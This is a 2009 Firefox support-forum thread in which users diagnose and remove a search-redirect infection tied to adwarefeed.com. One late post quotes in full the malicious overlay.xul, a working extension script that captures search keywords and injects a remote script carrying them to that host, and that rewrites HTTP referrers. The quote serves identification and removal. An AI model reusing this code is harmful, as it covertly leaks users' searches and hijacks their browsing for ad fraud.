MozillaZine

"clickfeedmanager.com" virus targets Firefox

User Help for Mozilla Firefox
Tony Dragani
Guest
 

Post Posted February 9th, 2009, 8:30 am

Hey guys,

There appears to be a new virus on the scene that targets Firefox users. It's a variation of the old "Google redirect"" virus that effects your search results, so that when you click on them it takes you to various ad sites. This variation effects both Google and Yahoo search results, and only seems to work in Firefox.

The redirects themselves take you through a site called "clickfraudmanager.com." The script that is doing this is coming from "adwarefeed.com." I've spent the better part of the weekend researching this, and it appears that this virus is really, really new, and has only been making the rounds for the past three or four days. At present, no antivirus or antimalware software is detecting it. If you do a search on this topic, you will see that no one in any of the computer support forums out there has been able to figure this out yet. You can, however, disable the redirecting by turning off Java or by installing the NoScripts Firefox addon, as I did. Of course, those measures don't treat the underlying problem.

the-edmeister

User avatar
 
Posts: 31011
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Post Posted February 9th, 2009, 11:41 am

If you can isolate and save whatever is being installed, the vendors of the various Malware scanning programs would probably like to see it so that they can come up with a fix. Submission procedures vary, but most have specific rules for emailing it to them.

I agree, I started seeing an increase in postings here and at SUMO about something new last Thursday, but the initial reports started about 10 days ago, IIRC.


Ed
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.

Tony Dragani
Guest
 

Post Posted February 9th, 2009, 1:50 pm

Hey Ed,

Thanks for the reply.

First off, I made a mistake in the title of this thread. The virus routes through "clickfraudmanager.com," not "clickfeedmanager.com." I was confusing it with "adwarefeed.com," which is where the script is coming from.

Anyway, I'm not sure how to isolate and save whatever is being installed. Honestly, I'm not sure what or where the file is that's doing this. I would really like to have something to send to the Malware scanning vendors. Any ideas?

Tony

the-edmeister

User avatar
 
Posts: 31011
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Post Posted February 9th, 2009, 2:27 pm

These are probably the best forums for malware removal help. They are where the "first responders" to threats hang out.
http://www.spywarewarrior.com/index.php
http://forum.aumha.org/
http://www.spywareinfoforum.com/
http://bleepingcomputer.com

Do a Google search for clickfraudmanager.com and you'll find threads already discussing removal of that.
http://www.bleepingcomputer.com/forums/topic201315.html

BTW, it might be risky for you to be a "first responder" without some specific guidance from your AV vendor. I wouldn't try it myself, but then again I don't seem to pickup much crap like that - hell I don't even use a Firewall, just rely upon my Linksys router to block that stuff, along with Avast! and Super AntiSpyware catching whatever the router allow through.


Ed
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.

Tony Dragani
Guest
 

Post Posted February 9th, 2009, 3:07 pm

I stumbled across the solution:

It appears that the virus is hidden in the Firefox Folder. You must uninstall Firefox from the control panel, and then delete the Mozilla Firefox Folder off of your hard drive. Then download and reinstall Firefox. The problem is then gone.

To prevent this in the future, I recommend using the following two Firefox Addons: WOT (web of trust) and NoScript. These two addons will effectively stop any more viruses from being installed via the Firefox browser.

the-edmeister

User avatar
 
Posts: 31011
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Post Posted February 9th, 2009, 3:27 pm

Sorry, but that is "butcher surgery" for a pimple, why amputate the limb?
Exactly which folder was that virus in?

There has to be a less destructive method of removing that virus.



Ed
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.

GudgeonPin

User avatar
 
Posts: 368
Joined: March 8th, 2008, 4:10 pm

Post Posted February 9th, 2009, 4:56 pm

the-edmeister wrote:Sorry, but that is "butcher surgery" for a pimple, why amputate the limb?
Exactly which folder was that virus in?
There has to be a less destructive method of removing that virus.


I have to agree Ed. If the problem is not a stand alone .EXE but is now attached to an existing FF3 .EXE or .DLL or something, would a reinstall of FF3 on top of the existing one preserve all of the underlying settings and overwrite old files killing the attached code?
Cary G.

the-edmeister

User avatar
 
Posts: 31011
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Post Posted February 9th, 2009, 7:18 pm

I get a little frustrated trying to help users figure this stuff out because I don't seem to ever get this crap dumped on my PC and then have the opportunity to have to figure out how to fix it. I guess that's how Mac and Linux users feel, too.


.
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.

Thedeadjester

User avatar
 
Posts: 1
Joined: February 9th, 2009, 8:31 pm

Post Posted February 9th, 2009, 8:47 pm

I HAD the exact same problem

I tried all the malware removal tools... nothing worked. I went through all the forums (bleepingcomputer...etc) and downloaded all the malware/spyware tools out there (over 10 different ones). None of them found anything!

I refuse to download a plugin just to take back my browser and I am not one to wait around till someone else figures it out so I went in on my own and looked around. I believe I have a workaround that doesn't involve a complete re-install... however it is close to a re-install and it is a little messy so use at your own risk! It worked for me so there is hope it can work for you.

1. Close Firefox
2. Navigate to the Mozilla firefox folder in program files
3. Go into the extensions folder
4. There will be several folders with funny characters (i.e. {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}). Look for the folder with a modified date on or around the date your noticed firefox acting funny and re-directing you to other pages.
5. Delete this folder. (if there is only one folder here I am not sure what this will do but you might want to consider the possibility of losing firefox specific data or having to re-install firefox if you remove this)
6. Re-open firefox.... and enjoy!

Note: individual results may vary and I am NOT responsible for any porn links you may lose in the process :twisted:
"Don't thank me... just pay it forward"

Rookie_MIB
Guest
 

Post Posted February 9th, 2009, 9:08 pm

Did some more digging through this and found out that the problem is contained in a file called 'overlay.xul'

In it, it runs a stupid little redirection script which not only 'overlays' a clickmanager type link for google and yahoo, but ask, altavista,
and just about every other search engine out there. You can just delete the 'overlay.xul' file (or that directory contained in your
'program_files/mozilla/firefox/extentions/{xxxxxxxxxx}/chrome/content/') which has that overlay file.

So to recap:
1) shut down firefox.
2) go to the 'program files/mozilla/firefox/extentions' directory
3) delete the directory which has the overlay.xul file (or was created when you noticed the redirection)
4) restart the browser

Nasty little thing - what a pain in the arse, but it's pretty simple. Just frustrating.

Guest
Guest
 

Post Posted February 9th, 2009, 9:12 pm

Thedeadjester wrote:I HAD the exact same problem

I tried all the malware removal tools... nothing worked. I went through all the forums (bleepingcomputer...etc) and downloaded all the malware/spyware tools out there (over 10 different ones). None of them found anything!

I refuse to download a plugin just to take back my browser and I am not one to wait around till someone else figures it out so I went in on my own and looked around. I believe I have a workaround that doesn't involve a complete re-install... however it is close to a re-install and it is a little messy so use at your own risk! It worked for me so there is hope it can work for you.

1. Close Firefox
2. Navigate to the Mozilla firefox folder in program files
3. Go into the extensions folder
4. There will be several folders with funny characters (i.e. {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}). Look for the folder with a modified date on or around the date your noticed firefox acting funny and re-directing you to other pages.
5. Delete this folder. (if there is only one folder here I am not sure what this will do but you might want to consider the possibility of losing firefox specific data or having to re-install firefox if you remove this)
6. Re-open firefox.... and enjoy!

Note: individual results may vary and I am NOT responsible for any porn links you may lose in the process :twisted:

IT seems to have worked. I've been killing myself since last Thursday trying to get rid of this thing. I tried every antispyware, antimalware, antivirus and registry cleaner imaginable. Your solution was the simplest and only one to be effective. YOU ARE THE MAN!!!!!!!

the-edmeister

User avatar
 
Posts: 31011
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Post Posted February 9th, 2009, 10:11 pm

Thedeadjester wrote:I HAD the exact same problem

I tried all the malware removal tools... nothing worked. I went through all the forums (bleepingcomputer...etc) and downloaded all the malware/spyware tools out there (over 10 different ones). None of them found anything!

I refuse to download a plugin just to take back my browser and I am not one to wait around till someone else figures it out so I went in on my own and looked around. I believe I have a workaround that doesn't involve a complete re-install... however it is close to a re-install and it is a little messy so use at your own risk! It worked for me so there is hope it can work for you.

1. Close Firefox
2. Navigate to the Mozilla firefox folder in program files
3. Go into the extensions folder
4. There will be several folders with funny characters (i.e. {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}). Look for the folder with a modified date on or around the date your noticed firefox acting funny and re-directing you to other pages.
5. Delete this folder. (if there is only one folder here I am not sure what this will do but you might want to consider the possibility of losing firefox specific data or having to re-install firefox if you remove this)
6. Re-open firefox.... and enjoy!

Now that is a good solution! A very reasoned, diagnostic type approach to "removing the pimple", instead of amputating the limb!

Note: individual results may vary and I am NOT responsible for any porn links you may lose in the process.
My thoughts on that matter.
Pron is so readily available that losing a few links might be a good thing, you just look for more and you might find a new favorite pron TGP site.
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.

Frank Azle
Guest
 

Post Posted February 10th, 2009, 12:31 am

I don't think the Overlay.xul is necessarily the problem because in other add-ons it is there. (I have it in as Morning Coffee and yetanothersmoothscrolling). However, the suggestion to delete that new folder worked so much thanks!!!

brian_o
Guest
 

Post Posted February 10th, 2009, 1:51 am

If you look at the code inside overlay.xul, you'll see that it's designed to do the exact thing you're complaining about (i.e. redirect searches to other sites). Overlay.xul IS the problem, remove it.
But, make sure you're deleting the correct overlay.xul.
Here are the contents of my (viral) one:


<overlay id="xulcache-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript" >
window.addEventListener("load", function() { xulRef.init(); }, false);
window.addEventListener("load", initRequestObserver, false);
var xulRef = {
init:
function(){
var appcontent = document.getElementById("appcontent");
if(appcontent){
appcontent.addEventListener("DOMContentLoaded", xulRef.onPageLoad, true);
}
},
onPageLoad:
function(aEvent){
var doc = aEvent.originalTarget;
var loc = doc.location.href;
var ref = doc.referrer;
var keyword = '';
var engine ;
var __d = "http://v1.adwarefeed.com/ffjs.php?u=2630369290-57989841-1078081533-839522115a=998&amp;s=3&amp;v=icv270109ff&amp;e=";

if( loc.match(/google\..+\/search.*[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'google';
// } else if(loc.match(/search\.ua.+[&amp;\?]q=([^&amp;]*)/)){
// keyword = RegExp.$1;
} else if ( loc.match(/search\.yahoo.*search.*[&amp;\?]p=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'yahoo';
} else if(loc.match(/altavista\.com.*results[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'altavista';
} else if(loc.match(/alltheweb\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'alltheweb';
} else if(loc.match(/search\.netscape\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'netscape';
} else if(loc.match(/search\.aol\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'aol';
} else if(loc.match(/ask\.com.*web[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'ask';
} else if(loc.match(/search\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'searchcom';
} else if(loc.match(/search\.lycos\.com.*[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'lycos';
} else if(loc.match(/nova\.rambler\.ru.*search[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'rambler';
} else if(loc.match(/gogo\.ru.*go[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'gogo';
} else if(loc.match(/meta\.ua.*search.asp[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'meta';
//} else if(loc.match(/au\.ru.*searchPhrase=([^&amp;]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/all\.by.*search.*[&amp;\?]query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'allby';
// } else if(loc.match(/uaport\.net.*UAcatalog[/][&amp;\?].*query=([^&amp;]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/search\.msn\.com.*results.*[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'msn';
} else if(loc.match(/search\.live\.com.*results.*[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'live';
};

if( keyword.length > 0 ){
var script = window.content.document.createElement('script');
script.id = "js_0";
script.src = __d + engine + '&amp;q=' + keyword;
doc.getElementsByTagName('head')[0].appendChild(script);
}
}
};
function initRequestObserver() {
var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
observerService.addObserver(httpRequestObserver, "http-on-modify-request", false);
}

var httpRequestObserver = {
observe:
function(subject, topic, data) {
if(topic == "http-on-modify-request") {
var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
var pos = subject.URI.spec.indexOf("&amp;rf=http");
if(pos > -1) {
var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"] .getService(Components.interfaces.nsIIOService) .newURI(decodeURIComponent(subject.URI.spec.substring(pos+4)), null, null);
httpChannel.referrer = newRef; subject.URI.spec = subject.URI.spec.substring(0, pos);
}
}
}
};

</script>
</overlay>

guest1976
Guest
 

Post Posted February 10th, 2009, 10:11 am

That helped thanks.

Return to Firefox Support


Who is online

Users browsing this forum: COKEDUDE, malliz, mod_wastrel and 26 guests